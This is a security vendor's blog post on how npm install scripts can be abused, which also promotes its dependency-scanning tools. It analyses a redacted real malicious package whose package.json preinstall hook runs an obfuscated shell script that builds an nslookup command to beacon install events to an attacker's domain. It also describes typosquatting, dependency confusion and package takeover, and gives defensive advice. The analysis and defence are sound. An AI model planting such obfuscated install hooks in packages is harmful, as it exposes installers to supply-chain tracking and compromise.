Blog

How npm install scripts can be weaponized: A real-world example of a harmful npm package

How npm preinstall and postinstall scripts can serve as methods to inject malicious code into open source packages.

Author: Edward Thomson
/
10 mins read
/
Mar 3, 2024
Cybersecurity

At the beginning of 2020, my boss at GitHub pulled me in to a surprise meeting. “I think that we’re going to buy npm,” he told me. “The npm registry keeps growing, and the team managing it can’t keep up. We want to make sure that the npm registry stays online. Anyway, I want you to manage Product for npm.”

Up until that point, like many – dare I say most – developers, I had used npm, but I hadn’t really thought deeply about it. I knew that if I wanted to install some package for Node.js, I ran npm install. I knew that I used npm as a frontend – running npm run start or something like it – to actually execute my Node.js apps. And I knew that npm had recently started alerting me when a package in my dependency chain had a known vulnerability.

And I also had a personal connection: there was a project called NodeGit that provided a JavaScript interface to a project called libgit2, that I maintain. I had worked a bit with the team that wrote NodeGit, and I knew that when you ran npm install, it would build a copy of libgit2 automatically.

So I knew that npm had a notion of “lifecycle scripts” – including some that could run during package installation. But as soon as I was faced with being responsible for npm, I realized that there was a pretty significant risk here: people wouldn’t just publish packages with helpful scripts to the registry.

Attackers could also put malicious scripts into the registry pretty easily, and if they convinced people to install their packages, could do some real harm.

Many people, of course, had come to this realization long before me – including, we quickly discovered, attackers. So one of the core investments that GitHub made after acquiring npm was to improve its security posture. With that investment, today the npm team mitigates many malicious packages before they’re even published, and the GitHub Trust and Safety team works diligently to take down risky packages promptly when they’re discovered by security researchers at organizations like Stacklok.

At Stacklok, we look at packages in the npm registry as part of our Trusty product, analyzing things like the activity and provenance so that our users can make informed decisions about their dependencies. And we also find packages that do malicious things. Here’s an example of one of the real-life packages that we’ve discovered in the npm repository that exercise some harmful behavior.

An example of a malicious package

This is a slightly redacted version of a real package that was published to npmjs.com and detected by researchers at Stacklok. This isn’t the most malicious package, but it makes an excellent example since it has a script that is small, easy to understand, and shows some of the tactics that package authors use to hide their intent. We’ve only changed the package name and the hostname in this example to illustrate the methods without showing the exact hostname that was used to avoid giving the author unwanted attention.

The original package had a name that disguised its intent, and it included a package.json that specified a preinstall script that would – by default – be executed when the package was installed. The preinstall script ran install.sh, a shell script that was bundled with the package.

JSON
{
  “name”: “very-trustyworthy-package”,
  “version”: “0.0.42”,
  “scripts”: {
    “preinstall”: “sh install.sh”
  }
}
Shell (Bash)
#!/usr/bin/env sh

echo “Starting build..."
amount=ample
former=ex
organization=org
install_a=nslo
install_b=okup

$install_a$install_b trustworthy-package.xyz.$former$amount.$organization >/dev/null

echo “Build succeeded..."

Looking at the install.sh, it may take a moment to grasp what’s going on here, because the install.sh script has been obfuscated. Fundamentally, the script sets some variables, then concatenates them to form a command:

Shell (Bash)
nslookup trustyworthy-package.xyz.example.org >/dev/null

So when you run npm install on this package, or on a package that claims this package as a dependency, it will not actually perform any of the builds that it claims to do. Instead, it will do a DNS call, ultimately looking up trustworthy-package.xyz.example.org. The owner of the xyz.example.org domain can identify when someone does that DNS lookup, so they can know when someone has installed their “trustyworthy package”, and even some information about that person, like their public IP address.

In other words, this package “phones home” to indicate that it was installed. Thankfully, the package isn’t downloading or installing any additional software, or trying to turn our machines into a botnet. It also doesn’t appear to be trying to exfiltrate any data from our computer or upload our source code. But it does tell the attacker that we installed the package and they tricked us into running their script.

It’s impossible to know exactly what the author’s motivation was with publishing this package. This could be a package used by a security researcher as a proof of concept. When you monitor the npm registry, you quickly discover that there are numerous packages published that are used to demonstrate problems within an organization. This particular package may be used by a pentester or red team to illustrate how a company's current setup makes them vulnerable to dependency confusion attacks.

But this could also be a “canary” in an actual dependency confusion attack. The author may have uploaded this package as a comparatively harmless dependency, and now they’re trying to sneak it in to an organization. Maybe they’re doing some social engineering, or testing to see if someone will install it accidentally, through a typo. When someone does eventually install the package, it will “phone home” to the author, who will then know that their canary has made its way into somebody’s software supply chain. The author can then publish a newer version of the package that does exfiltrate some data.

Regardless of their intent, we disclose these packages to the team that manages the npm registry. Uploading malicious code is against the npm terms of service, even when it’s being used for research. The GitHub Trust and Safety team reviews these reports and deletes the packages from the registry promptly.

How can install scripts be weaponized?

A package with a malicious install script doesn’t actually cause any harm until it's downloaded and installed so that the install script is actually executed. There are three common attacks that leverage npm’s install scripts.

  • Package takeover attacks occur when a malicious actor gains access to publish an existing package, either through the source code repository or being able to publish directly to a registry.

  • Typosquatting attacks occur when a malicious actor publishes a package that has a name like a popular package, and relies on people mistyping (or misreading) a malicious package as if it were the package that they meant to install. For example, a malicious package named nextt might accidentally get installed by people meaning to run npm install next.

  • Dependency confusion attacks target individual organizations with malicious packages that have the same name as their internal packages. These attacks require knowledge of the organization’s internal packages and relies on the target’s internal package registry being configured to “fall back” to server packages from the public registry. For example, imagine Duff Industries has a package named duff-telemetry@1.2.3 hosted on their internal package registry. An attacker may be able to publish a package named duff-telemetry@99.0.0 to the public registry, which will be served instead of the correct package since it has a higher version number.

In any of these situations, an attacker can execute arbitrary code on a target’s machine.

When are install scripts useful?

You might be thinking that we should just get rid of install scripts altogether. But the preinstall and postinstall scripts are valuable for many packages.

A clever use of an install script is in the Jakyll project, which is a simple static website generator. Jakyll contains a postinstall script that will bootstrap a GitHub Actions workflow for you. So when you install Jakyll, you’ll have a workflow that deploys your site to GitHub Pages without needing to set it up. This makes for a delightful developer experience.

preinstall scripts are often used to install mandatory dependencies, particularly by packages that interact with other applications or with native libraries. As mentioned earlier, the NodeGit package is a set of JavaScript “bindings” for the libgit2 project, which is written in C. NodeGit includes install scripts that will try to download pre-built versions of libgit2 for your system, and if they don’t exist, will actually compile libgit2 on your computer.

Without being able to run the preinstall script to install the native dependency, NodeGit simply wouldn’t work.

How to keep yourself safe

Thankfully, the GitHub has made significant investments in keeping the npm registry safe and secure. For example, the registry now rejects publishes of packages that look like typosquatting attacks. But no effort can be perfect, so you should be thoughtful about the dependencies that you use.

The common guidance is that you should avoid installing code that you’re not familiar with, whenever possible. And that is great advice, but it’s not always realistic because the average JavaScript project has over 500 dependencies! So even if you carefully audit your direct dependencies, it’s almost impossible to audit all your dependencies’ dependencies.

One option that can help is to run npm with the --ignore-scripts option. For example: npm install --ignore-scripts next. This will ensure that none of the preinstall or postinstall scripts are run in next or in any of its dependencies. This will protect you from malicious packages that have malicious preinstall or postinstall scripts. But it will also break some packages that need to legitimately download or build dependencies. So you should be thoughtful about using this option.

Instead of trying to solve these problems manually, you may want to use some automated dependency analysis and enforcement. That’s why we developed free-to-use tools like Trusty and Minder.

Trusty by Stacklok can help you understand the health of your dependencies and the potential risks in using new packages. Trusty is unique in that it looks at a package both independently, as well as with a holistic view of the ecosystem. Trusty looks at things like how often a package is being published, who is contributing to it, and whether it’s being developed with industry standard best practices. All of the malicious packages that we’ve detected have very low Trusty Scores, most of them 0.0.

You can then use a tool like Minder by Stacklok to monitor these dependencies and how they fit in to your software development lifecycle (SDLC). For example, you can configure Minder to examine pull requests coming in to your GitHub repository, look at new dependencies being added in PRs, and check the Trusty Score of those dependencies. Minder can then alert you, or even block a pull request that introduces new dependencies with a low Trusty Score. This is a low-friction way that allows you to analyze questionable dependencies before merging the PR that introduces them.

With Trusty and Minder together, if a developer accidentally mistypes a package name and succumbs to a typosquatting attack, it can be caught when the pull request is opened, before it is integrated into your source tree.

In conclusion

There’s been significant research into using install scripts as an attack vector, and thankfully, significant investment by the npm team into mitigating that risk. Despite that, even in 2024, install scripts do represent a real risk through package takeovers, typosquatting, and dependency confusion attacks.

I encourage you to be thoughtful about the packages that you install, and to use scanning and policy tools to help you combat those risks.

Edward Thomson

Product Manager

Edward is a product manager at Stacklok, overseeing product strategy for Stacklok's products, Minder and Trusty. Prior to Stacklok, he was Director of Product Management at Vercel, and a product manager at GItHub focused on GitHub Actions and npm.